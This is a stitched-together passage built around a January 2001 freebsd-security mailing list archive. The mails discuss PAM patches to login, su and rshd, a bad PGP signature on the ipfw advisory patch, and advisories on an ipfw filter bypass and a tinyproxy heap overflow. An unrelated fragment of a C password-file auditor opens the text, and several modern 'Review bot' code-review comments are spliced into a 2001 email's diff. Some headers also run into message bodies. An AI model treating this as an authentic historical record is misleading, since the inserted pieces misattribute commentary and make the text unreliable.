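    "operator:*:2:5::0:0:System &:/:/sbin/nologin",
    "uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico",
    "guest::1001:1001::0:0:Constructed guest:/home/guest:/bin/sh",
};

int main(void)
{
    struct audit_result r = audit_entries(sample_master_passwd, 6);
    printf("%d uid-0 accounts, %d findings\n", r.uid0_accounts, r.findings);
    return 0;
}
```

On a real system the lines would have to be read with root privilege, as Pete notes; the program only reads and reports, and never rewrites the file, which is what vipw(8) is for.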
From: "Jacques A. Vidrine"
To: freebsd-security@freebsd.org
Subject: Re: cvs commit: src/usr.bin/login login.c
Message-ID: <20010123154829.A74738@hamlet.nectar.com>
Mail-Followup-To: "Jacques A. Vidrine" , freebsd-security@freebsd.org
References: <200101232143.f0NLhXJ91854@freefall.freebsd.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200101232143.f0NLhXJ91854@freefall.freebsd.org>; from nectar@FreeBSD.org on Tue, Jan 23, 2001 at 01:43:33PM -0800
X-Url: http://www.nectar.com/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Jan 23, 2001 at 01:43:33PM -0800, Jacques Vidrine wrote:
> nectar      2001/01/23 13:43:32 PST
>
>   Modified files:
>     usr.bin/login        login.c
>   Log:
>   Call pam_setcred.
>
>   Reviewed by:  markm, months ago

This gets you to the point that if you carefully [1] configure PAM, and you log in using pam_krb5, you will have tickets. As per the pam_krb5 documentation, you have to destroy them yourself with `kdestroy'.

One day when pam_setcred stacking in Linux-PAM works, you won't have to be so careful with configuration. Also one day, someone may have login fork() so that it can call pam_close_session and ditch the credentials.

--
Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org

[1] In most cases, making sure pam_krb5 is first in your config is enough to do the trick.
From owner-freebsd-security Tue Jan 23 14:13:45 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 6DA4937B69D for ; Tue, 23 Jan 2001 14:13:22 -0800 (PST)
Received: from hamlet.nectar.com (hamlet.nectar.com [10.0.1.102]) by gw.nectar.com (Postfix) with ESMTP id D6ECE193E4; Tue, 23 Jan 2001 16:13:18 -0600 (CST)
Received: (from nectar@localhost) by hamlet.nectar.com (8.11.1/8.9.3) id f0NMDIE81819; Tue, 23 Jan 2001 16:13:18 -0600 (CST) (envelope-from nectar@spawn.nectar.com)
Date: Tue, 23 Jan 2001 16:13:18 -0600
From: "Jacques A. Vidrine"
To: "David J. MacKenzie"
Cc: freebsd-security@freebsd.org
Subject: Re: PAM patches, iteration 4
Message-ID: <20010123161318.A95429@hamlet.nectar.com>
Mail-Followup-To: "Jacques A. Vidrine" , "David J. MacKenzie" , freebsd-security@freebsd.org
References: <20010123184611.E675046C7@dagger.web.us.uu.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010123184611.E675046C7@dagger.web.us.uu.net>; from djm@web.us.uu.net on Tue, Jan 23, 2001 at 01:46:11PM -0500
X-Url: http://www.nectar.com/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Tue, Jan 23, 2001 at 01:46:11PM -0500, David J. MacKenzie wrote:
> I've updated the docs to reflect PAM, cleaned up some error handling,
> and included my patch to work around the pam_setcred() dispatch problem.
> I also removed the non-logincap code path from su and rshd, since it's
> already mandatory in login. As before, this replaces my earlier patches.
> I'd welcome having PAM experts examine them closely. I think they're
> ready for a wider audience.

Oops, I just committed a 3-line patch to login.c to call pam_setcred. This'll put your diff off a wee bit.

These patches look good to me. The pam_setcred workaround is no worse than what we have now [1], and it is useful. I'll let you know how they work for me (on -STABLE).

Thanks!
--
Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org

[1] All the PAM modules in the base system just return PAM_SUCCESS, so this will have no effect unless a third-party module is installed, such as ports/security/krb5.
From owner-freebsd-security Tue Jan 23 15:24:39 2001
Delivered-To: freebsd-security@freebsd.org
Received: from catapult.web.us.uu.net (catapult.web.us.uu.net [208.211.134.20]) by hub.freebsd.org (Postfix) with ESMTP id 0EA8F37B400 for ; Tue, 23 Jan 2001 15:24:16 -0800 (PST)
Received: from catapult.web.us.uu.net (localhost.web.us.uu.net [127.0.0.1]) by catapult.web.us.uu.net (Postfix) with ESMTP id 6AC8C3E5B; Tue, 23 Jan 2001 18:24:15 -0500 (EST)
To: "Jacques A. Vidrine" , "David J. MacKenzie" , freebsd-security@freebsd.org
Subject: Re: PAM patches, iteration 4
In-Reply-To: Message from "Jacques A. Vidrine" of "Tue, 23 Jan 2001 16:13:18 CST." <20010123161318.A95429@hamlet.nectar.com>
Date: Tue, 23 Jan 2001 18:24:15 -0500
From: "David J. MacKenzie" Message-Id: <20010123232415.6AC8C3E5B@catapult.web.us.uu.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > These patches look like good to me. The pam_setcred workaround is no > worse than what we have now [1], and it is useful. > > [1] All the PAM modules in the base system just return PAM_SUCCESS, so > this will have no effect unless a third-party module is installed, > such as ports/security/krb5. The pam_krb5 port does the right thing, I believe. One unresolved question I have is, when should pam_end() be called. Probably in the same places that login_close() and endpwent() are. I think I called it in places where it's unnecessary and omitted it in a place where it's important. Here's a patch to my last patch set to make pam_end() calls more consistent. It's still not perfect yet, though; anytime after pam_setcred(PAM_ESTABLISH_CRED) has been called, before exiting, pam_setcred(PAM_DELETE_CRED) should be called to clean up. Perhaps the same for pam_open_session() and pam_close_session(). I haven't done that so far. --- su.c 2001/01/23 18:10:00 1.16 +++ su.c 2001/01/23 23:15:02 @@ -235,7 +235,6 @@ retcode = pam_set_item(pamh, PAM_RHOST, myhost); if (retcode != PAM_SUCCESS) { syslog(LOG_ERR, "pam_set_item(PAM_RHOST): %s", pam_strerror(pamh, retcode)); - pam_end(pamh, retcode); errx(1, "pam_set_item(PAM_RHOST): %s", pam_strerror(pamh, retcode)); } @@ -245,7 +244,6 @@ retcode = pam_set_item(pamh, PAM_TTY, mytty); if (retcode != PAM_SUCCESS) { syslog(LOG_ERR, "pam_set_item(PAM_TTY): %s", pam_strerror(pamh, retcode)); - pam_end(pamh, retcode); errx(1, "pam_set_item(PAM_TTY): %s", pam_strerror(pamh, retcode)); } @@ -253,7 +251,6 @@ retcode = pam_authenticate(pamh, 0); if (retcode != PAM_SUCCESS) { syslog(LOG_ERR, "pam_authenticate: %s", pam_strerror(pamh, retcode)); - pam_end(pamh, retcode); errx(1, "Sorry"); } 
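Review bot: the su.c hunks at lines 235, 245 and 253 drop pam_end() from error paths that then leave through errx(1, ...), so on PAM_RHOST, PAM_TTY or pam_authenticate failure the PAM transaction is never closed and no module cleanup runs. That is probably acceptable because the process exits immediately, but since the stated goal is making the pam_end() calls consistent, a short comment at the first errx() saying that process exit is the cleanup here would keep a later reader from reinstating them; the same applies to the parallel removals in rshd.c.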
@@ -268,13 +265,11 @@ retcode = pam_chauthtok(pamh, PAM_CHANGE_EXPIRED_AUTHTOK); if (retcode != PAM_SUCCESS) { syslog(LOG_ERR, "pam_chauthtok: %s", pam_strerror(pamh, retcode)); - pam_end(pamh, retcode); errx(1, "Sorry"); } } if (retcode != PAM_SUCCESS) { syslog(LOG_ERR, "pam_acct_mgmt: %s", pam_strerror(pamh, retcode)); - pam_end(pamh, retcode); errx(1, "Sorry"); } } @@ -485,6 +480,10 @@ if (env != NULL) { for (i=0; env[i]; i++) putenv(env[i]); + } + retcode = pam_end(pamh, PAM_DATA_SILENT); + if (retcode != PAM_SUCCESS) { + syslog(LOG_ERR, "pam_end: %s", pam_strerror(pamh, retcode)); } #endif /* USE_PAM */ --- login.c 2001/01/23 00:57:28 1.8 +++ login.c 2001/01/23 23:10:47 @@ -593,7 +593,7 @@ PAM_END; exit(0); } else { - if ((e = pam_end(pamh, e)) != PAM_SUCCESS) + if ((e = pam_end(pamh, PAM_DATA_SILENT)) != PAM_SUCCESS) syslog(LOG_ERR, "pam_end: %s", pam_strerror(pamh, e)); } } @@ -738,14 +738,12 @@ if ((e = pam_set_item(pamh, PAM_TTY, tty)) != PAM_SUCCESS) { syslog(LOG_ERR, "pam_set_item(PAM_TTY): %s", pam_strerror(pamh, e)); - pam_end(pamh, e); return -1; } if (hostname != NULL && (e = pam_set_item(pamh, PAM_RHOST, full_hostname)) != PAM_SUCCESS) { syslog(LOG_ERR, "pam_set_item(PAM_RHOST): %s", pam_strerror(pamh, e)); - pam_end(pamh, e); return -1; } e = pam_authenticate(pamh, 0); --- rshd.c 2001/01/23 18:09:49 1.14 +++ rshd.c 2001/01/23 23:14:05 
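Review bot: in the su.c hunk at line 485, pam_strerror(pamh, retcode) is evaluated after pam_end(pamh, ...) has released the handle, so the failure branch hands an already-closed handle back to the library; the login.c hunk at line 593 keeps that ordering, and the final rshd.c hunk at line 717 adds the same pattern. Logging without the handle, for example syslog(LOG_ERR, "pam_end failed: %d", retcode), avoids it. The login.c change also replaces the last PAM status e with the bare PAM_DATA_SILENT flag; if the intent is only to add the flag for the forked child, `e | PAM_DATA_SILENT` keeps the status that modules see.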
@@ -382,21 +382,18 @@ retcode = pam_set_item (pamh, PAM_RUSER, remuser); if (retcode != PAM_SUCCESS) { syslog(LOG_ERR|LOG_AUTH, "pam_set_item(PAM_RUSER): %s", pam_strerror(pamh, retcode)); - pam_end(pamh, retcode); error("Login incorrect.\n"); exit(1); } retcode = pam_set_item (pamh, PAM_RHOST, fromhost); if (retcode != PAM_SUCCESS) { syslog(LOG_ERR|LOG_AUTH, "pam_set_item(PAM_RHOST): %s", pam_strerror(pamh, retcode)); - pam_end(pamh, retcode); error("Login incorrect.\n"); exit(1); } retcode = pam_set_item (pamh, PAM_TTY, "tty"); if (retcode != PAM_SUCCESS) { syslog(LOG_ERR|LOG_AUTH, "pam_set_item(PAM_TTY): %s", pam_strerror(pamh, retcode)); - pam_end(pamh, retcode); error("Login incorrect.\n"); exit(1); } @@ -414,7 +411,6 @@ if (retcode != PAM_SUCCESS) { syslog(LOG_INFO|LOG_AUTH, "%s@%s as %s: permission denied (%s). cmd='%.80s'", remuser, fromhost, locuser, pam_strerror(pamh, retcode), cmdbuf); - pam_end(pamh, retcode); error("Login incorrect.\n"); exit(1); } @@ -535,9 +531,6 @@ pid = fork(); if (pid == -1) { error("Can't fork; try again.\n"); -#ifdef USE_PAM - PAM_END; -#endif /* USE_PAM */ exit(1); } if (pid) { @@ -681,7 +674,6 @@ pid = fork(); if (pid == -1) { error("Can't fork; try again.\n"); - PAM_END; exit(1); } if (pid) { 
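Review bot: of the two fork-failure paths in rshd.c, the hunk at line 535 removes PAM_END together with its #ifdef USE_PAM guards, while the hunk at line 681 removes a bare PAM_END; the context does not show whether that second path sits inside a larger #ifdef USE_PAM block, so it is worth confirming that the file still builds with USE_PAM undefined. As in su.c, both paths now exit(1) with the transaction open, which is fine only if process exit is the intended cleanup.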
@@ -717,6 +709,8 @@ for (i=0; env[i]; i++) putenv(env[i]); } + if ((retcode = pam_end(pamh, PAM_DATA_SILENT)) != PAM_SUCCESS) + syslog(LOG_ERR|LOG_AUTH, "pam_end: %s", pam_strerror(pamh, retcode)); #endif /* USE_PAM */ endpwent(); To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 17: 3:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from onion.ish.org (onion.ish.org [210.145.219.202]) by hub.freebsd.org (Postfix) with ESMTP id 8D81F37B6A8; Tue, 23 Jan 2001 17:03:07 -0800 (PST) Received: from localhost (ishizuka@localhost [127.0.0.1]) by onion.ish.org (8.11.1/8.11.1/2000-12-01) with ESMTP id f0O135l05147; Wed, 24 Jan 2001 10:03:05 +0900 (JST) (envelope-from ishizuka@ish.org) To: security-advisories@FreeBSD.ORG Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:08.ipfw In-Reply-To: <20010123210823.349E837B402@hub.freebsd.org> References: <20010123210823.349E837B402@hub.freebsd.org> X-Mailer: Mew version 1.94.2 on Emacs 19.34 / Mule 2.3 (SUETSUMUHANA) X-PGP-Fingerprint20: 276D 697A C2CB 1580 C683 8F18 DA98 1A4A 50D2 C4CB X-PGP-Fingerprint16: C6 DE 46 24 D7 9F 22 EB 79 E2 90 AB 1B 9A 35 2E X-PGP-Public-Key: http://www.ish.org/pgp-public-key.txt X-URL: http://www.ish.org/ Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <20010124100304J.ishizuka@onion.ish.org> Date: Wed, 24 Jan 2001 10:03:04 +0900 
From: Masachika ISHIZUKA
X-Dispatcher: imput version 20000414(IM141)
Lines: 27
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> FreeBSD-SA-01:08
>
> Topic: ipfw/ip6fw allows bypassing of 'established' keyword
> [snip]
>
> [FreeBSD 4.x]
> # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:08/ipfw-4.x.patch
> # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:08/ipfw-4.x.patch.asc

Hi, this is ishizuka@ish.org.

Are the patch files shown above correct? pgp shows a bad signature, as follows.

| % pgpv -m ipfw-4.x.patch.asc
| This signature applies to another message
| File to check signature against [ipfw-4.x.patch]:
| BAD signature made 2001-01-23 03:32 GMT by key:
|    1024 bits, Key ID 73D288A5, Created 1996-04-22
|    "FreeBSD Security Officer "
| % md5 ipfw-4.x.patch*
| MD5 (ipfw-4.x.patch) = 6c7cf3425a62c54a4e32a85faa87a505
| MD5 (ipfw-4.x.patch.asc) = 6edf1b52f33af8d6b34fbd60ef7d74cd

--
ishizuka@ish.org

From owner-freebsd-security Tue Jan 23 18:22:39 2001
Delivered-To: freebsd-security@freebsd.org
Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 80FB537B402 for ; Tue, 23 Jan 2001 18:22:18 -0800 (PST)
Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0O2Ph823914; Tue, 23 Jan 2001 18:25:43 -0800 (PST) (envelope-from kris)
Date: Tue, 23 Jan 2001 18:25:38 -0800
From: Kris Kennaway
To: Masachika ISHIZUKA
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:08.ipfw
Message-ID: <20010123182538.A23758@citusc17.usc.edu>
References: <20010123210823.349E837B402@hub.freebsd.org> <20010124100304J.ishizuka@onion.ish.org>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="ew6BAiZeqk4r7MaW"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010124100304J.ishizuka@onion.ish.org>; from ishizuka@ish.org on Wed, Jan 24, 2001 at 10:03:04AM +0900
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

--ew6BAiZeqk4r7MaW
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Wed, Jan 24, 2001 at 10:03:04AM +0900, Masachika ISHIZUKA wrote:
> Hi, this is ishizuka@ish.org.
>
> Are the patch files shown above correct?
> pgp shows a bad signature, as follows.

Oops, not sure what went wrong then (the bad signature was in fact the one I uploaded, but it must have been against an older version of the diff). I have uploaded the correct signature now.

It's good to see people are actually checking this!
Kris

--
NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org

--ew6BAiZeqk4r7MaW
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE6bj0hWry0BWjoQKURAhgjAJ9LzOJ0NtNhc+jX9bt+rmYqWvHcoACeJGc9
Z/9Ltr5Du6eB0Q9um0sCCMo=
=Mzb5
-----END PGP SIGNATURE-----

--ew6BAiZeqk4r7MaW--

From owner-freebsd-security Tue Jan 23 18:36: 5 2001
Delivered-To: freebsd-security@freebsd.org
Received: from onion.ish.org (onion.ish.org [210.145.219.202]) by hub.freebsd.org (Postfix) with ESMTP id 1194937B400; Tue, 23 Jan 2001 18:35:47 -0800 (PST)
Received: from localhost (ishizuka@localhost [127.0.0.1]) by onion.ish.org (8.11.2/8.11.1/2000-12-01) with ESMTP id f0O2ZjV13790; Wed, 24 Jan 2001 11:35:45 +0900 (JST) (envelope-from ishizuka@ish.org)
To: kris@FreeBSD.ORG
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:08.ipfw
In-Reply-To: <20010123182538.A23758@citusc17.usc.edu>
References: <20010123210823.349E837B402@hub.freebsd.org> <20010124100304J.ishizuka@onion.ish.org> <20010123182538.A23758@citusc17.usc.edu>
X-Mailer: Mew version 1.94.2 on Emacs 19.34 / Mule 2.3 (SUETSUMUHANA)
X-PGP-Fingerprint20: 276D 697A C2CB 1580 C683 8F18 DA98 1A4A 50D2 C4CB
X-PGP-Fingerprint16: C6 DE 46 24 D7 9F 22 EB 79 E2 90 AB 1B 9A 35 2E
X-PGP-Public-Key: http://www.ish.org/pgp-public-key.txt
X-URL: http://www.ish.org/
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20010124113545V.ishizuka@onion.ish.org>
Date: Wed, 24 Jan 2001 11:35:45 +0900
From: Masachika ISHIZUKA
X-Dispatcher: imput version 20000414(IM141)
Lines: 16
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>> Are the patch files shown above correct?
>> pgp shows a bad signature, as follows.
>
> Oops, not sure what went wrong then (the bad signature was in fact the
> one I uploaded, but it must have been against an older version of the
> diff). I have uploaded the correct signature now.
>
> It's good to see people are actually checking this!

Dear Kris,

Thank you for updating ipfw-4.x.patch.asc. I was able to verify the pgp signature successfully.

--
ishizuka@ish.org

From owner-freebsd-security Tue Jan 23 18:47:36 2001
Delivered-To: freebsd-security@freebsd.org
Received: from security1.noc.flyingcroc.net (security1.noc.flyingcroc.net [207.246.128.54]) by hub.freebsd.org (Postfix) with ESMTP id BFC4B37B698 for ; Tue, 23 Jan 2001 18:47:18 -0800 (PST)
Received: from localhost (todd@localhost) by security1.noc.flyingcroc.net (8.9.3/8.9.3) with ESMTP id SAA74117 for ; Tue, 23 Jan 2001 18:47:08 -0800 (PST) (envelope-from todd@flyingcroc.net)
X-Authentication-Warning: security1.noc.flyingcroc.net: todd owned process doing -bs
Date: Tue, 23 Jan 2001 18:47:08 -0800 (PST)
From: Todd Backman X-Sender: todd@security1.noc.flyingcroc.net To: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:08.ipfw In-Reply-To: <20010123210823.349E837B402@hub.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Anyone else failing here?: Patching file sys/netinet/ip_fw.c using Plan A... Hunk #1 succeeded at 244. Hunk #2 failed at 1214. Thanks. - Todd On Tue, 23 Jan 2001, FreeBSD Security Advisories wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > ============================================================================= > FreeBSD-SA-01:08 Security Advisory > FreeBSD, Inc. > > Topic: ipfw/ip6fw allows bypassing of 'established' keyword > > Category: core > Module: kernel > Announced: 2001-01-23 > Credits: Aragon Gouveia > Affects: FreeBSD 3.x (all releases), FreeBSD 4.x (all releases), > FreeBSD 3.5-STABLE and 4.2-STABLE prior to the > correction date. > Corrected: 2001-01-09 (FreeBSD 4.2-STABLE) > 2001-01-12 (FreeBSD 3.5-STABLE) > FreeBSD only: Yes > > I. Background > > ipfw is a system facility which allows IP packet filtering, > redirecting, and traffic accounting. ip6fw is the corresponding > utility for IPv6 networks, included in FreeBSD 4.0 and above. It is > based on an old version of ipfw and does not contain as many features. > > II. Problem Description > > Due to overloading of the TCP reserved flags field, ipfw and ip6fw > incorrectly treat all TCP packets with the ECE flag set as being part > of an established TCP connection, which will therefore match a > corresponding ipfw rule containing the 'established' qualifier, even > if the packet is not part of an established connection. > > The ECE flag is not believed to be in common use on the Internet at > present, but is part of an experimental extension to TCP for > congestion notification. 
> At least one other major operating system
> will emit TCP packets with the ECE flag set under certain operating
> conditions.
>
> Only systems which have enabled ipfw or ip6fw and use a ruleset
> containing TCP rules which make use of the 'established' qualifier,
> such as "allow tcp from any to any established", are vulnerable. The
> exact impact of the vulnerability on such systems is undetermined and
> depends on the exact ruleset in use.
>
> All released versions of FreeBSD prior to the correction date
> including FreeBSD 3.5.1 and FreeBSD 4.2 are vulnerable, but it was
> corrected prior to the (future) release of FreeBSD 4.3.
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security-notifications" in the body of the message
>

From owner-freebsd-security Tue Jan 23 18:56:57 2001
Delivered-To: freebsd-security@freebsd.org
Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id B2BAA37B69F for ; Tue, 23 Jan 2001 18:56:38 -0800 (PST)
Received: by peitho.fxp.org (Postfix, from userid 1000) id 6AC321360C; Tue, 23 Jan 2001 21:56:38 -0500 (EST)
Date: Tue, 23 Jan 2001 21:56:38 -0500
From: Chris Faulhaber
To: freebsd-security@FreeBSD.org
Subject: tinyproxy advisory
Message-ID: <20010123215638.B47775@peitho.fxp.org>
Mail-Followup-To: Chris Faulhaber , freebsd-security@FreeBSD.org
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i

=============================================================================
FreeBSD-SA-01:XX                                           Security Advisory
                                                                FreeBSD, Inc.

Topic:          tinyproxy contains multiple remote vulnerabilities

Category:       ports
Module:         tinyproxy
Announced:      2001-XX-XX
Credits:        |CyRaX|
Affects:        Ports collection prior to the correction date.
Corrected:      2001-01-22
Vendor status:  Updated version released
FreeBSD only:   NO

I. Background

tinyproxy is a lightweight http proxy.

II. Problem Description

The tinyproxy port, versions prior to 1.3.3a, contains multiple remote
vulnerabilities. Due to a heap overflow, malicious remote users can
cause a denial-of-service by crashing the proxy. Additionally, the
attacker may potentially cause arbitrary code to be executed as the
user running tinyproxy.

The tinyproxy port is not installed by default, nor is it "part of
FreeBSD" as such: it is part of the FreeBSD ports collection, which
contains over 4200 third-party applications in a ready-to-install
format. The ports collections shipped with FreeBSD 3.5.1 and 4.2
contain this problem since it was discovered after the releases.

FreeBSD makes no claim about the security of these third-party
applications, although an effort is underway to provide a security
audit of the most security-critical ports.

III. Impact

Malicious remote users may cause a denial-of-service and potentially
cause arbitrary code to be executed. If you have not chosen to install
the tinyproxy port/package, then your system is not vulnerable to this
problem.

IV. Workaround

Deinstall the tinyproxy port/package, if you have installed it.

V. Solution

One of the following:

1) Upgrade your entire ports collection and rebuild the tinyproxy port.

2) Deinstall the old package and install a new package dated after the
correction date, obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/www/tinyproxy-1.3.3a.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/www/tinyproxy-1.3.3a.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/www/tinyproxy-1.3.3a.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/www/tinyproxy-1.3.3a.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/www/tinyproxy-1.3.3a.tgz

NOTE: It may be several days before updated packages are available.

3) Download a new port skeleton for the tinyproxy port from:

http://www.freebsd.org/ports/

and use it to rebuild the port.

4) Use the portcheckout utility to automate option (3) above. The
portcheckout port is available in /usr/ports/devel/portcheckout or the
package can be obtained from:

ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-3-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz
ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz

From owner-freebsd-security Tue Jan 23 19:04:22 2001
Delivered-To: freebsd-security@freebsd.org
Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id E46F337B6A0 for ; Tue, 23 Jan 2001 19:04:04 -0800 (PST)
Received: by peitho.fxp.org (Postfix, from userid 1501) id BEA9613613; Tue, 23 Jan 2001 22:04:04 -0500 (EST)
Date: Tue, 23 Jan 2001 22:04:04 -0500
From: Chris Faulhaber
To: freebsd-security@FreeBSD.org
Subject: Re: tinyproxy advisory
Message-ID: <20010123220404.A2625@peitho.fxp.org>
Mail-Followup-To: Chris Faulhaber , freebsd-security@FreeBSD.org
References: <20010123215638.B47775@peitho.fxp.org>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010123215638.B47775@peitho.fxp.org>; from jedgar@fxp.org on Tue, Jan 23, 2001 at 09:56:38PM -0500

On Tue, Jan 23, 2001 at 09:56:38PM -0500, Chris Faulhaber wrote:
>
> =============================================================================
> FreeBSD-SA-01:XX                                           Security Advisory
>                                                                 FreeBSD, Inc.
>
> Topic:          tinyproxy contains multiple remote vulnerabilities
>

Oops, ignore this, sent to the wrong list :)

--
Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org
--------------------------------------------------------
FreeBSD: The Power To Serve - http://www.FreeBSD.org

From owner-freebsd-security Tue Jan 23 19:08:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from security1.noc.flyingcroc.net (security1.noc.flyingcroc.net [207.246.128.54]) by hub.freebsd.org (Postfix) with ESMTP id 2E96137B69F for ; Tue, 23 Jan 2001 19:08:09 -0800 (PST)
Received: from localhost (todd@localhost) by security1.noc.flyingcroc.net (8.9.3/8.9.3) with ESMTP id TAA74172 for ; Tue, 23 Jan 2001 19:07:39 -0800 (PST) (envelope-from todd@flyingcroc.net)
X-Authentication-Warning: security1.noc.flyingcroc.net: todd owned process doing -bs
Date: Tue, 23 Jan 2001 19:07:38 -0800 (PST)
From: Todd Backman
X-Sender: todd@security1.noc.flyingcroc.net
To: security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:08.ipfw
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

BTW... this is occurring upon 2 of my 4.0 machines.

Thanks.

- Todd

On Tue, 23 Jan 2001, Todd Backman wrote:

>
> Anyone else failing here?:
>
> Patching file sys/netinet/ip_fw.c using Plan A...
> Hunk #1 succeeded at 244.
> Hunk #2 failed at 1214.
>
> Thanks.
>
> - Todd
>
> On Tue, 23 Jan 2001, FreeBSD Security Advisories wrote:
>
> > -----BEGIN PGP SIGNED MESSAGE-----
> >
> > =============================================================================
> > FreeBSD-SA-01:08                                           Security Advisory
> >                                                                 FreeBSD, Inc.
> >
> > Topic:          ipfw/ip6fw allows bypassing of 'established' keyword
> >
> > Category:       core
> > Module:         kernel
> > Announced:      2001-01-23
> > Credits:        Aragon Gouveia
> > Affects:        FreeBSD 3.x (all releases), FreeBSD 4.x (all releases),
> >                 FreeBSD 3.5-STABLE and 4.2-STABLE prior to the
> >                 correction date.
> > Corrected:      2001-01-09 (FreeBSD 4.2-STABLE)
> >                 2001-01-12 (FreeBSD 3.5-STABLE)
> > FreeBSD only:   Yes
> >
> > I. Background
> >
> > ipfw is a system facility which allows IP packet filtering,
> > redirecting, and traffic accounting. ip6fw is the corresponding
> > utility for IPv6 networks, included in FreeBSD 4.0 and above. It is
> > based on an old version of ipfw and does not contain as many features.
>

From owner-freebsd-security Tue Jan 23 19:10:05 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cscfx.sytex.com (cscfx.sytex.com [205.147.190.131]) by hub.freebsd.org (Postfix) with ESMTP id C5D5437B69F; Tue, 23 Jan 2001 19:09:48 -0800 (PST)
Received: (from rwc@localhost) by cscfx.sytex.com (8.11.1/8.11.1) id f0O39hP15584; Tue, 23 Jan 2001 22:09:43 -0500 (EST) (envelope-from rwc)
From: Richard Cramer
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <14958.18295.257000.756678@cscfx.sytex.com>
Date: Tue, 23 Jan 2001 22:09:43 -0500 (EST)
To: Masachika ISHIZUKA
Cc: kris@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:08.ipfw
In-Reply-To: <20010124113545V.ishizuka@onion.ish.org>
References: <20010123210823.349E837B402@hub.freebsd.org> <20010124100304J.ishizuka@onion.ish.org> <20010123182538.A23758@citusc17.usc.edu> <20010124113545V.ishizuka@onion.ish.org>
